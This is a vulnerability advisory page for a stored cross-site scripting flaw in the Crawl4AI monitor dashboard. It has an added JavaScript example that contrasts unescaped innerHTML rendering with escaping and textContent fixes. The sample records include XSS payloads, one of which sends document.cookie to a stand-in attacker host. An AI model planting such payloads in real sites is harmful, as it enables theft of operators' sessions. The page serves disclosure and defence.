Crawl4AI - Stored Cross-Site Scripting in Monitor Dashboard
Description
Crawl4AI before 0.8.7 contains a stored cross-site scripting vulnerability in the monitor dashboard that renders crawl URLs and error messages via innerHTML without escaping. An attacker can submit a crafted crawl request with malicious markup that executes in an operator's browser when viewing the dashboard.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
Patches
Vulnerability mechanics
Root cause
"The monitor dashboard uses innerHTML to render crawl URLs and error messages without escaping, allowing stored cross-site scripting."
Attack vector
An attacker submits a crafted crawl request whose URL contains HTML/JavaScript markup, or whose processing produces an error message that carries such markup. The values are stored with the crawl job, and when an operator views the monitor dashboard they are inserted into the page via `innerHTML` without escaping, so the browser parses the markup and executes the payload in the operator's session. This is a stored cross-site scripting (XSS) issue [CWE-79] [1].
Affected code
The monitor dashboard in Crawl4AI renders crawl URLs and error messages via `innerHTML` without escaping. The advisory does not specify exact file paths, but the vulnerability resides in the dashboard component that displays submitted crawl requests.
What the fix does
The advisory describes version 0.8.7 as a security-hardening release that fixes critical vulnerabilities including this XSS. The bundle contains no patch diff, so the exact change is not visible here; the expected fix is to stop treating user-supplied values (URLs and error messages) as markup, either by escaping them before interpolation into `innerHTML` or by building the DOM nodes directly and assigning the values through `textContent`. A complete fix also has to consider where else the stored URL is used, for example as a link target, since HTML escaping alone does not neutralize a `javascript:` URL placed in an `href`.
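The rendering pattern the root cause and attack vector describe, beside the two hardening options discussed above, as an added example that is not Crawl4AI's own code. The crawl record shape (`url`, `status`, `error`), the function names, the sample records and the minimal document stub are all assumptions so the file runs offline in Node; in a browser, pass `document` to `renderRowDom`. The `safeHref` check goes beyond the advisory text: it matters only if the dashboard also renders the crawl URL as a link, which the advisory does not state.

```javascript
// Added example, not Crawl4AI's code. Shows the innerHTML pattern described
// in the advisory next to an escaped and a DOM-based rendering of the same
// crawl record. Record shape and function names are assumptions.

// Constructed sample data: one benign job and one carrying XSS payloads in
// both fields the advisory names (the crawl URL and the error message).
const CRAWL_RECORDS = [
  { url: "https://example.com/page", status: "done", error: "" },
  {
    url: 'https://example.com/"><img src=x onerror=alert(document.cookie)>',
    status: "failed",
    error: "Timeout <script>fetch('https://attacker.invalid/?c='+document.cookie)</script>",
  },
];

// Vulnerable pattern: untrusted strings are concatenated into markup that is
// later assigned to innerHTML, so any tag in the data becomes live DOM.
function renderRowVulnerable(rec) {
  return `<tr><td>${rec.url}</td><td>${rec.status}</td><td>${rec.error}</td></tr>`;
}

// Minimal HTML escaper for the five characters that can break out of text
// content or a double-quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Fix option 1: keep string building but escape every untrusted value before
// interpolation, so the browser renders it as text rather than as elements.
function renderRowEscaped(rec) {
  return `<tr><td>${escapeHtml(rec.url)}</td><td>${escapeHtml(rec.status)}</td><td>${escapeHtml(rec.error)}</td></tr>`;
}

// Fix option 2 (preferred): build nodes with DOM APIs and set textContent,
// which never parses its argument as HTML. `doc` is document-like so the
// function can run outside a browser.
function renderRowDom(rec, doc) {
  const tr = doc.createElement("tr");
  for (const value of [rec.url, rec.status, rec.error]) {
    const td = doc.createElement("td");
    td.textContent = value;
    tr.appendChild(td);
  }
  return tr;
}

// Caveat if the URL is also used as a link target: escaping makes a
// javascript: URL harmless as text, but it still executes when placed in an
// href. Allow only http(s) and return null otherwise. (Assumed dashboard
// behaviour; the advisory does not say URLs are rendered as links.)
function safeHref(url) {
  try {
    const u = new URL(url);
    return u.protocol === "http:" || u.protocol === "https:" ? u.href : null;
  } catch {
    return null;
  }
}

// Tiny stand-in for the DOM, used only to run this file in Node.
function fakeDocument() {
  return {
    createElement(tag) {
      return { tag, textContent: "", children: [], appendChild(c) { this.children.push(c); } };
    },
  };
}

function demo() {
  const bad = CRAWL_RECORDS[1];
  console.log("vulnerable markup:", renderRowVulnerable(bad));
  console.log("escaped markup:   ", renderRowEscaped(bad));
  const tr = renderRowDom(bad, fakeDocument());
  console.log("textContent cells:", tr.children.map((td) => td.textContent));
  console.log("href for javascript: URL:", safeHref("javascript:alert(1)"));
}
demo();
```

In the vulnerable output the `<img ... onerror=...>` and `<script>` fragments appear verbatim and would be parsed by the browser; in the escaped output they appear as `&lt;img` and `&lt;script`, and with `textContent` the payload is stored as the cell's text and is never parsed. A Content-Security-Policy without `'unsafe-inline'` is a useful second layer but does not replace the output encoding.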
Preconditions
- network: The attacker must be able to submit crawl requests to the Crawl4AI instance (for example through its API or web interface), which is how the malicious URL or error text reaches the stored job data.
- auth/user interaction: An operator must open the monitor dashboard on which the stored crawl request is displayed; the payload then runs with that operator's browser session.
Generated on Jun 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- [1] github.com/unclecode/crawl4ai/security/advisories/GHSA-365w-hqf6-vxfg (vendor advisory, via MITRE)
- [2] www.vulncheck.com/advisories/crawl4ai-stored-cross-site-scripting-in-monitor-dashboard (third-party advisory, via MITRE)